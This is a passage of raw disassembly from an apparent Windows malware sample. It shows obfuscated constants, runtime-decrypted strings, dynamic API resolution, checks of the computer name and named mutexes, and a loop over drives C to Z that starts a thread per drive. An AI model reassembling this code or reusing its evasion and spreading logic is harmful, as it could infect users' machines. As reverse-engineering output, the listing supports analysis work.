movsx ecx, word ptr ds:1001324Ch
add edx, ecx
cmp eax, edx
jge short loc_41B209
loc_41B1FF: ; CODE XREF: sub_41A999+80A�j
; sub_41A999+832�j
mov [ebp+var_60EAC], 1
loc_41B209: ; CODE XREF: sub_41A999+7B9�j
; sub_41A999+84E�j ...
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jnb loc_41B2D3
mov eax, [ebp+var_40E9C]
movsx edx, word ptr ds:10013240h
add edx, ds:10013200h
sub edx, 6
add eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, ds:1001321Ch
add edx, 0Fh
add edx, ds:10013128h
cmp eax, edx
jle short loc_41B26D
mov edx, ds:100130D4h
add edx, 26h
add edx, ds:10013270h
cmp eax, edx
jl short loc_41B2C9
loc_41B26D: ; CODE XREF: sub_41A999+8BF�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:1001317Ch
add edx, 31h
movsx ecx, word ptr ds:10013100h
add edx, ecx
cmp eax, edx
jle short loc_41B29F
movsx edx, word ptr ds:10013174h
mov ecx, ds:100131A8h
lea edx, [edx+ecx+38h]
cmp eax, edx
jl short loc_41B2C9
loc_41B29F: ; CODE XREF: sub_41A999+8EF�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:100130A0h
add edx, 74h
movsx ecx, word ptr ds:10013098h
add edx, ecx
cmp eax, edx
jle short loc_41B2D3
mov edx, ds:10013200h
add edx, 7Ah
cmp eax, edx
jge short loc_41B2D3
loc_41B2C9: ; CODE XREF: sub_41A999+8D2�j
; sub_41A999+904�j
mov [ebp+var_60EAC], 1
loc_41B2D3: ; CODE XREF: sub_41A999+79A�j
; sub_41A999+87C�j ...
cmp [ebp+var_60EAC], 0
jnz short loc_41B2FC
mov eax, [ebp+var_60EB4]
mov edx, [ebp+var_40E9C]
mov dl, [ebp+edx+var_50E9B]
mov [ebp+eax+var_50E9B], dl
inc [ebp+var_60EB4]
loc_41B2FC: ; CODE XREF: sub_41A999+941�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, ds:100131CCh
add edx, 1Ah
cmp eax, edx
jnz short loc_41B321
mov [ebp+var_60EAC], 1
loc_41B321: ; CODE XREF: sub_41A999+97C�j
inc [ebp+var_40E9C]
loc_41B327: ; CODE XREF: sub_41A999+74B�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jb loc_41B0E9
mov eax, [ebp+var_60EB4]
mov edx, ds:100130F4h
add edx, ds:10013138h
sub edx, 7
mov [ebp+eax+var_50E9B], dl
loc_41B355: ; CODE XREF: sub_41A999+4FD�j
mov eax, [ebp+var_60ED4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B361: ; CODE XREF: sub_41A999+4D9�j
and [ebp+var_60EB0], 0
lea eax, [ebp+var_60EB0]
push eax
push 10014A88h
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013158h
sub eax, 9
cmp ebx, eax
jnz loc_41B675
lea eax, [ebp+var_60EBC]
push eax
mov eax, [ebp+var_60EB0]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
movsx eax, word ptr ds:10013174h
movsx edx, word ptr ds:10013264h
add eax, edx
sub eax, 10h
cmp ebx, eax
jnz loc_41B669
mov eax, ds:100130ACh
dec eax
mov [ebp-50EA0h], eax
jmp loc_41B657
; ---------------------------------------------------------------------------
loc_41B3D7: ; CODE XREF: sub_41A999+CCA�j
mov eax, ds:100131ACh
sub eax, 5
push eax
call dword ptr ds:10012630h
pop ecx
mov [ebp+var_70F08], 2
mov eax, [ebp-50EA0h]
mov [ebp+var_70F00], eax
lea eax, [ebp+var_70EF8]
push eax
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_60EB0]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
mov eax, ds:100131E8h
movsx edx, word ptr ds:10013150h
add eax, edx
sub eax, 9
cmp ebx, eax
jnz loc_41B651
and [ebp+var_70EF4], 0
lea eax, [ebp+var_70EF4]
push eax
push 10014A78h
mov eax, [ebp+var_70EF8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013128h
sub eax, 9
cmp ebx, eax
jnz loc_41B645
lea eax, [ebp+var_60EF0]
push eax
mov eax, ds:10013168h
add eax, ds:10013280h
sub eax, 4
push eax
push [ebp+var_30E44]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_41B4BB
cmp [ebp+var_60EF0], 8
jz short loc_41B4C0
loc_41B4BB: ; CODE XREF: sub_41A999+B16�j
jmp loc_41B639
; ---------------------------------------------------------------------------
loc_41B4C0: ; CODE XREF: sub_41A999+B20�j
movsx eax, word ptr ds:1001322Ch
add eax, ds:10013140h
movsx edx, word ptr ds:10013180h
sub edx, 4
mov byte ptr [ebp+eax+var_70F00+1], dl
lea eax, [ebp+var_70EEF]
push eax
push [ebp+var_60EE8]
call sub_41E841
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F0C], edi
push [ebp+var_60EE8]
call dword ptr ds:10012BA0h
mov eax, ds:100131E8h
movsx edx, word ptr ds:100130BCh
add eax, edx
movsx eax, [ebp+eax+var_70EF9]
mov edx, ds:100131F4h
add edx, ds:100131F8h
sub edx, 7
cmp eax, edx
jz loc_41B639
push [ebp+var_30E4C]
lea eax, [ebp+var_70EEF]
push eax
call sub_41FF98
add esp, 8
lea eax, [ebp+var_60EF0]
push eax
mov eax, ds:10013254h
movsx edx, word ptr ds:100131DCh
add eax, edx
sub eax, 0Ah
push eax
push [ebp+var_30E48]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, ds:10013158h
mov edx, ds:10013198h
sub edx, 2
mov byte ptr [ebp+eax+var_71F10], dl
or ebx, ebx
jnz short loc_41B5C4
cmp [ebp+var_60EF0], 8
jnz short loc_41B5C4
lea eax, [ebp+var_71F07]
push eax
push [ebp+var_60EE8]
call sub_41E841
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F10], edi
push [ebp+var_60EE8]
call dword ptr ds:10012BA0h
loc_41B5C4: ; CODE XREF: sub_41A999+BF5�j
; sub_41A999+BFF�j
push 10014957h
call sub_41E914
push dword ptr [ebp-50EA0h]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10012634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
lea eax, [ebp+var_71F07]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
push 10014952h
call sub_41E914
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D020h
lea eax, [ebp+var_70EEF]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
add esp, 34h
loc_41B639: ; CODE XREF: sub_41A999:loc_41B4BB�j
; sub_41A999+B96�j
mov eax, [ebp+var_70EF4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B645: ; CODE XREF: sub_41A999+AE4�j
mov eax, [ebp+var_70EF8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B651: ; CODE XREF: sub_41A999+AAF�j
inc dword ptr [ebp-50EA0h]
loc_41B657: ; CODE XREF: sub_41A999+A39�j
mov eax, [ebp+var_60EBC]
cmp [ebp-50EA0h], eax
jb loc_41B3D7
loc_41B669: ; CODE XREF: sub_41A999+A27�j
mov eax, [ebp+var_60EB0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B675: ; CODE XREF: sub_41A999+9F7�j
mov eax, [ebp+var_60EC0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
movzx eax, [ebp+var_50E9B]
mov edx, ds:100131ECh
sub edx, 8
cmp eax, edx
jz short loc_41B6DC
push 1001494Ch
call sub_41E914
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D020h
lea eax, [ebp+var_50E9B]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
push 10014947h
call sub_41E914
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D020h
add esp, 20h
loc_41B6DC: ; CODE XREF: sub_41A999+46F�j
; sub_41A999+CFA�j
inc [ebp+var_30E50]
loc_41B6E2: ; CODE XREF: sub_41A999+3F9�j
mov eax, [ebp+var_30E58]
cmp [ebp+var_30E50], eax
jb loc_41AD97
loc_41B6F4: ; CODE XREF: sub_41A999+28D�j
; sub_41A999+30D�j ...
inc [ebp+var_40E5C]
mov eax, [ebp+var_40E90]
cmp [ebp+var_40E5C], eax
jl loc_41ABE1
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1001262Ch
pop ecx
push [ebp+var_30E44]
call dword ptr ds:10012BA0h
push [ebp+var_30E48]
call dword ptr ds:10012BA0h
loc_41B732: ; CODE XREF: sub_41A999+1EE�j
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B73E: ; CODE XREF: sub_41A999+1C7�j
mov eax, [ebp+var_40E6C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B74A: ; CODE XREF: sub_41A999+1A4�j
mov eax, [ebp+var_40E68]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B756: ; CODE XREF: sub_41A999+C7�j
; sub_41A999:loc_41AAB4�j ...
mov eax, [ebp+var_40E64]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B762: ; CODE XREF: sub_41A999+61�j
; sub_41A999+A2�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A999 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B767 proc near ; CODE XREF: sub_41CFF0+94�p
; sub_41CFF0+CE�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 0Ah
mov edx, 0CCCCCCCDh
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
add edi, 61h
mov ebx, edi
mov [ebp+arg_0], bl
mov al, [ebp+arg_0]
cmp al, 65h
jz short loc_41B7A8
cmp al, 79h
jz short loc_41B7A8
cmp al, 75h
jz short loc_41B7A8
cmp al, 69h
jz short loc_41B7A8
cmp al, 6Fh
jz short loc_41B7A8
cmp al, 61h
jnz short loc_41B7AC
loc_41B7A8: ; CODE XREF: sub_41B767+2B�j
; sub_41B767+2F�j ...
add [ebp+arg_0], 1
loc_41B7AC: ; CODE XREF: sub_41B767+3F�j
cmp [ebp+arg_0], 6Ah
jnz short loc_41B7B6
add [ebp+arg_0], 1
loc_41B7B6: ; CODE XREF: sub_41B767+49�j
movzx eax, [ebp+arg_0]
pop edi
pop ebx
leave
retn
sub_41B767 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7BE proc near ; CODE XREF: .data:0041DD80�p
var_100C = byte ptr -100Ch
var_1004 = byte ptr -1004h
var_1003 = byte ptr -1003h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_425379
push ebx
push esi
push edi
push 10014935h
call sub_41E914
pop ecx
push 0
push eax
push 0
push [ebp+arg_0]
call dword ptr ds:1001263Ch
mov edi, eax
or edi, edi
jnz short loc_41B7F0
mov edi, [ebp+arg_0]
loc_41B7F0: ; CODE XREF: sub_41B7BE+2D�j
push 1001491Fh
call sub_41E914
pop ecx
push 0
push eax
push 0
push edi
call dword ptr ds:1001263Ch
mov edi, eax
lea eax, [ebp+var_FFF]
push eax
push 0FFFh
push 0Dh
push edi
call dword ptr ds:1000D014h
movsx eax, word ptr ds:100131B4h
add eax, ds:10013188h
cmp [ebp+eax+var_1003], 20h
jnz short loc_41B84E
mov eax, ds:10013194h
add eax, ds:100131C4h
cmp [ebp+eax+var_100C], 20h
jz loc_41B8E5
loc_41B84E: ; CODE XREF: sub_41B7BE+75�j
mov eax, ds:100130C8h
cmp [ebp+eax+var_FFF], 68h
jnz short loc_41B874
movsx eax, word ptr ds:10013230h
add eax, ds:10013188h
cmp [ebp+eax+var_1004], 74h
jz short loc_41B8E5
loc_41B874: ; CODE XREF: sub_41B7BE+9D�j
lea ecx, [ebp+var_FFF]
or eax, 0FFFFFFFFh
loc_41B87D: ; CODE XREF: sub_41B7BE+C4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41B87D
mov ebx, ds:10013274h
add ebx, 0Ch
cmp eax, ebx
jb short loc_41B8E5
push 1001491Ah
call sub_41E914
mov esi, ds:10013128h
sub esi, 5
push esi
push eax
lea esi, [ebp+var_FFF]
push esi
call sub_41A8C2
add esp, 10h
movsx ebx, word ptr ds:100131A4h
add ebx, 0FFF8h
cmp eax, ebx
jnz short loc_41B8E5
push 10014914h
call sub_41E914
pop ecx
push eax
mov esi, ds:10013214h
sub esi, 9
push esi
push 0Ch
push edi
call dword ptr ds:1000D014h
loc_41B8E5: ; CODE XREF: sub_41B7BE+8A�j
; sub_41B7BE+B4�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41B7BE endp
; =============== S U B R O U T I N E =======================================
sub_41B8EA proc near ; CODE XREF: .data:00421032�p
push edi
push 10014904h
call sub_41E914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132A8h, eax
test eax, eax
jnz short loc_41B91D
push 100148F4h
call sub_41E914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132A8h, eax
loc_41B91D: ; CODE XREF: sub_41B8EA+1A�j
push 100148E2h
call sub_41E914
push eax
push dword ptr ds:100132A8h
call dword ptr ds:1000F1F8h
mov ds:1000D044h, eax
push 100148D1h
call sub_41E914
push eax
push dword ptr ds:100132A8h
call dword ptr ds:1000F1F8h
mov ds:10012BA0h, eax
push 100148C1h
call sub_41E914
push eax
push dword ptr ds:100132A8h
call dword ptr ds:1000F1F8h
mov ds:10012BB0h, eax
push 100148B2h
call sub_41E914
push eax
push dword ptr ds:100132A8h
call dword ptr ds:1000F1F8h
mov ds:1000D038h, eax
push 100148A2h
call sub_41E914
add esp, 14h
push eax
push dword ptr ds:100132A8h
call dword ptr ds:1000F1F8h
mov ds:10010254h, eax
pop edi
retn
sub_41B8EA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10012BA8h
call dword ptr ds:1000FA3Ch
mov eax, ds:10012BA8h
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 10014AC8h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_41B9F1
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41BA39
; ---------------------------------------------------------------------------
loc_41B9F1: ; CODE XREF: .data:0041B9DF�j
push 10014A48h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_41BA11
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41BA39
; ---------------------------------------------------------------------------
loc_41BA11: ; CODE XREF: .data:0041B9FF�j
push 10014A18h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_41BA31
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41BA39
; ---------------------------------------------------------------------------
loc_41BA31: ; CODE XREF: .data:0041BA1F�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_41BA39: ; CODE XREF: .data:0041B9EF�j
; .data:0041BA0F�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
dd 4001B8h, 18C280h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov edi, [ebp+8]
push 10004490h
push dword ptr fs:0
mov fs:0, esp
push 1001489Ah
call sub_41E914
push dword ptr [edi]
push eax
lea esi, [ebp-0Ah]
push esi
call dword ptr ds:10012634h
add esp, 10h
loc_41BA7E: ; CODE XREF: .data:0041BAA3�j
push 0
push dword ptr [edi]
lea eax, [ebp-0Ah]
push eax
call sub_41F764
mov eax, ds:1001323Ch
add eax, ds:10013108h
sub eax, 0Bh
push eax
call dword ptr ds:10012630h
add esp, 10h
jmp short loc_41BA7E
; ---------------------------------------------------------------------------
db 5Fh, 5Eh, 0C9h
db 0C2h, 4, 0
; =============== S U B R O U T I N E =======================================
sub_41BAAB proc near ; CODE XREF: .data:0042103C�p
push edi
push 1001488Ch
call sub_41E914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132B0h, eax
test eax, eax
jnz short loc_41BADE
push 1001487Eh
call sub_41E914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132B0h, eax
loc_41BADE: ; CODE XREF: sub_41BAAB+1A�j
cmp dword ptr ds:100132B0h, 0
jz short loc_41BB01
mov eax, ds:10013248h
add eax, 5
push eax
push dword ptr ds:100132B0h
call dword ptr ds:1000F1F8h
mov ds:1000D01Ch, eax
loc_41BB01: ; CODE XREF: sub_41BAAB+3A�j
pop edi
retn
sub_41BAAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB03 proc near ; CODE XREF: .data:loc_421052�p
; .data:00422EAC�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 108h
push esi
push edi
movsx eax, word ptr ds:10013150h
mov edi, eax
add edi, ds:100130B8h
sub edi, 9
jmp short loc_41BB91
; ---------------------------------------------------------------------------
loc_41BB22: ; CODE XREF: sub_41BB03+A1�j
push 10014872h
call sub_41E914
mov [ebp+var_108], eax
push 10014868h
call sub_41E914
push edi
push eax
mov esi, [ebp+var_108]
push esi
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10012634h
add esp, 18h
lea eax, [ebp+var_FF]
push eax
push 0
push 1F0001h
call dword ptr ds:10011648h
mov [ebp+var_104], eax
or eax, eax
jz short loc_41BB90
push eax
call dword ptr ds:10011654h
mov eax, ds:100130B8h
dec eax
cmp edi, eax
jnz short loc_41BB89
xor eax, eax
inc eax
jmp short loc_41BBAC
; ---------------------------------------------------------------------------
loc_41BB89: ; CODE XREF: sub_41BB03+7F�j
mov eax, 2
jmp short loc_41BBAC
; ---------------------------------------------------------------------------
loc_41BB90: ; CODE XREF: sub_41BB03+6E�j
inc edi
loc_41BB91: ; CODE XREF: sub_41BB03+1D�j
mov eax, ds:10013234h
add eax, 5Ch
movsx edx, word ptr ds:10013178h
add eax, edx
cmp edi, eax
jb loc_41BB22
xor eax, eax
loc_41BBAC: ; CODE XREF: sub_41BB03+84�j
; sub_41BB03+8B�j
pop edi
pop esi
leave
retn
sub_41BB03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBB0 proc near ; CODE XREF: .data:0042104B�p
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
mov [ebp+var_104], 0FFh
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_FF]
push eax
call dword ptr ds:1000F5F0h
push 1001485Eh
call sub_41E914
mov edi, ds:10013138h
add edi, ds:100130DCh
sub edi, 2
push edi
push eax
lea edi, [ebp+var_FF]
push edi
call sub_41A8C2
add esp, 10h
movsx esi, word ptr ds:100131F0h
add esi, 0FFFCh
cmp eax, esi
jz short loc_41BC19
xor eax, eax
inc eax
jmp short loc_41BC60
; ---------------------------------------------------------------------------
loc_41BC19: ; CODE XREF: sub_41BBB0+62�j
push 10014852h
call sub_41E914
mov edi, ds:100131D0h
add edi, ds:100130A0h
sub edi, 0Ah
push edi
push eax
lea edi, [ebp+var_FF]
push edi
call sub_41A8C2
add esp, 10h
mov esi, ds:10013258h
add esi, 0FFF9h
add esi, ds:10013270h
cmp eax, esi
jz short loc_41BC5E
xor eax, eax
inc eax
jmp short loc_41BC60
; ---------------------------------------------------------------------------
loc_41BC5E: ; CODE XREF: sub_41BBB0+A7�j
xor eax, eax
loc_41BC60: ; CODE XREF: sub_41BBB0+67�j
; sub_41BBB0+AC�j
pop edi
pop esi
leave
retn
sub_41BBB0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov eax, [ebp+18h]
mov [ebp+18h], ax
movsx eax, word ptr ds:1001327Ch
add eax, 0C4h
cmp [ebp+0Ch], eax
jnz loc_41BD93
mov word ptr [ebp-18h], 3
lea eax, [ebp-10h]
push eax
mov eax, ds:10013394h
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov [ebp-4], eax
movsx eax, word ptr ds:1001327Ch
add eax, ds:100130B4h
sub eax, 0Ch
cmp [ebp-4], eax
jnz loc_41BD8F
dec dword ptr [ebp-10h]
lea eax, [ebp-1Ch]
push eax
lea esi, [ebp-18h]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, ds:10013394h
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov [ebp-4], eax
mov eax, ds:1001326Ch
sub eax, 9
cmp [ebp-4], eax
jnz loc_41BD8F
lea eax, [ebp-20h]
push eax
push 10014AD8h
mov eax, [ebp-1Ch]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp-4], eax
mov eax, ds:10013254h
add eax, ds:10013224h
sub eax, 0Eh
cmp [ebp-4], eax
jnz short loc_41BD86
lea eax, ds:10013390h
mov [ebp-8], eax
push eax
mov ebx, [eax]
call dword ptr [ebx+4]
lea eax, [ebp-24h]
push eax
push 10014A18h
mov eax, [ebp-8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp-4], eax
mov eax, ds:100130A0h
sub eax, 4
cmp [ebp-4], eax
jnz short loc_41BD74
lea eax, [ebp-2Ch]
push eax
push 10014A18h
push dword ptr [ebp-24h]
push dword ptr [ebp-20h]
call sub_421A4A
add esp, 10h
mov [ebp-28h], eax
mov eax, [ebp-24h]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_41BD74: ; CODE XREF: .data:0041BD4F�j
mov eax, [ebp-8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, [ebp-20h]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_41BD86: ; CODE XREF: .data:0041BD1A�j
mov eax, [ebp-1Ch]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_41BD8F: ; CODE XREF: .data:0041BCB4�j
; .data:0041BCEA�j
xor eax, eax
jmp short loc_41BD98
; ---------------------------------------------------------------------------
loc_41BD93: ; CODE XREF: .data:0041BC83�j
mov eax, 80020003h
loc_41BD98: ; CODE XREF: .data:0041BD91�j
pop edi
pop esi
pop ebx
leave
retn 24h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41BDA2: ; CODE XREF: .data:0041BDD2�j
movsx eax, word ptr ds:1001327Ch
sub eax, 4
push eax
call dword ptr ds:10012630h
pop ecx
movsx eax, word ptr ds:10013218h
add eax, ds:100131ACh
sub eax, 0Ah
push eax
push 10004912h
push 0
call dword ptr ds:1000D048h
jmp short loc_41BDA2
; ---------------------------------------------------------------------------
dd 4C25Dh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, 43h
jmp short loc_41BDF1
; ---------------------------------------------------------------------------
loc_41BDE8: ; CODE XREF: .data:0041BDF4�j
and dword ptr ds:10012790h[esi*4], 0
inc esi
loc_41BDF1: ; CODE XREF: .data:0041BDE6�j
cmp esi, 5Ah
jbe short loc_41BDE8
loc_41BDF6: ; CODE XREF: .data:0041BF6A�j
mov edi, 43h
jmp loc_41BF51
; ---------------------------------------------------------------------------
loc_41BE00: ; CODE XREF: .data:0041BF54�j
mov eax, ds:100131E8h
dec eax
push eax
call dword ptr ds:10012630h
push 1001484Ah
call sub_41E914
push edi
push eax
lea ebx, [ebp-0Eh]
push ebx
call dword ptr ds:10012634h
add esp, 14h
cmp dword ptr ds:10012790h[edi*4], 0
jz short loc_41BE6A
mov eax, ds:1001320Ch
sub eax, 6
mov [ebp-14h], eax
lea eax, [ebp-14h]
push eax
push dword ptr ds:10012790h[edi*4]
call dword ptr ds:10012650h
cmp dword ptr [ebp-14h], 103h
jz short loc_41BE6A
push dword ptr ds:10012790h[edi*4]
call dword ptr ds:10011654h
and dword ptr ds:10012790h[edi*4], 0
loc_41BE6A: ; CODE XREF: .data:0041BE2E�j
; .data:0041BE53�j
lea eax, [ebp-0Eh]
push eax
call dword ptr ds:10012668h
mov [ebp-4], eax
cmp eax, 3
jz short loc_41BEB2
cmp eax, 4
jz short loc_41BEB2
cmp eax, 2
jz short loc_41BEB2
cmp dword ptr ds:10012790h[edi*4], 0
jz loc_41BF50
mov ebx, ds:100130F8h
movsx edx, word ptr ds:100130E8h
add ebx, edx
sub ebx, 8
mov ds:1000F630h[edi*4], ebx
jmp loc_41BF50
; ---------------------------------------------------------------------------
loc_41BEB2: ; CODE XREF: .data:0041BE7A�j
; .data:0041BE7F�j ...
push 1
call dword ptr ds:1000E000h
lea eax, [ebp-24h]
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-18h]
push eax
lea eax, [ebp-0Eh]
push eax
call dword ptr ds:1000F0D4h
mov ebx, ds:10013134h
sub ebx, 8
cmp eax, ebx
jnz short loc_41BEFE
cmp dword ptr ds:10012790h[edi*4], 0
jz short loc_41BF50
movsx ebx, word ptr ds:10013144h
sub ebx, 6
mov ds:1000F630h[edi*4], ebx
jmp short loc_41BF50
; ---------------------------------------------------------------------------
loc_41BEFE: ; CODE XREF: .data:0041BEDF�j
cmp dword ptr ds:10012790h[edi*4], 0
jnz short loc_41BF50
mov ds:1000F630h[edi*4], edi
lea eax, [ebp-28h]
push eax
movsx eax, word ptr ds:10013264h
add eax, ds:10013194h
sub eax, 12h
push eax
lea ebx, ds:1000F630h[edi*4]
push ebx
push 1000263Bh
mov ebx, ds:10013114h
add ebx, ds:1001312Ch
sub ebx, 10h
push ebx
push 0
call dword ptr ds:10012B90h
mov ds:10012790h[edi*4], eax
loc_41BF50: ; CODE XREF: .data:0041BE8E�j
; .data:0041BEAD�j ...
inc edi
loc_41BF51: ; CODE XREF: .data:0041BDFB�j
cmp edi, 5Ah
jbe loc_41BE00
mov eax, ds:1001309Ch
sub eax, 5
push eax
call dword ptr ds:10012630h
pop ecx
jmp loc_41BDF6
; ---------------------------------------------------------------------------
db 5Fh
dd 0C2C95B5Eh
db 4, 0
; =============== S U B R O U T I N E =======================================
sub_41BF76 proc near ; CODE XREF: .data:00421293�p
push 2
call sub_4219EF
push 0
call sub_4219EF
add esp, 8
retn
sub_41BF76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BF88 proc near ; CODE XREF: .data:00421305�p
var_30D = byte ptr -30Dh
var_30C = byte ptr -30Ch
var_308 = byte ptr -308h
var_302 = byte ptr -302h
var_203 = byte ptr -203h
var_108 = byte ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
push ebp
mov ebp, esp
sub esp, 310h
push edi
push 0FFh
lea eax, [ebp+var_302]
push eax
call dword ptr ds:1000F600h
lea eax, [ebp+var_203]
push eax
push dword ptr ds:10013168h
push 0
push 1Ch
push 0
call dword ptr ds:1000FA44h
push 10014837h
call sub_41E914
movsx edi, word ptr ds:100131B4h
sub edi, 2
push edi
lea edi, [ebp+var_203]
push edi
push eax
push 1000F0F0h
call dword ptr ds:10012634h
push 10014824h
call sub_41E914
movsx edi, word ptr ds:10013124h
sub edi, 4
push edi
lea edi, [ebp+var_203]
push edi
push eax
push 10010260h
call dword ptr ds:10012634h
lea eax, ds:100083B6h
mov ds:1001262Ch, eax
lea eax, ds:100083B6h
mov ds:1000D04Ch, eax
lea eax, ds:100069B8h
mov ds:10012774h, eax
push 1000E020h
call sub_421596
movsx eax, word ptr ds:10013170h
mov edx, ds:10013184h
lea eax, [eax+edx+6]
push eax
push 10010230h
call sub_421760
lea eax, ds:10009DA6h
mov ds:10010228h, eax
lea eax, ds:10004982h
mov ds:1000FA30h, eax
lea eax, ds:1000F0F0h
mov ds:10011640h, eax
lea eax, ds:10010260h
mov ds:1000D018h, eax
lea eax, ds:10012670h
mov ds:10013370h, eax
lea eax, [ebp+var_308]
push eax
movsx eax, word ptr ds:10013230h
sub eax, 6
push eax
push 0
push 10002992h
push dword ptr ds:100131C8h
push 0
call dword ptr ds:10012B90h
push eax
call dword ptr ds:10011654h
lea eax, [ebp+var_30C]
push eax
movsx eax, word ptr ds:100131E0h
sub eax, 3
push eax
push 0
push 1000155Fh
mov eax, ds:10013148h
movsx edx, word ptr ds:10013170h
add eax, edx
sub eax, 4
push eax
push 0
call dword ptr ds:10012B90h
push eax
call dword ptr ds:10011654h
mov eax, ds:1001325Ch
add eax, 2
mov ds:1000F620h, eax
mov eax, ds:100130F8h
sub eax, 6
push eax
lea eax, [ebp+var_FF]
push eax
call sub_422FA4
add esp, 3Ch
mov eax, ds:100130ECh
cmp [ebp+eax+var_103], 64h
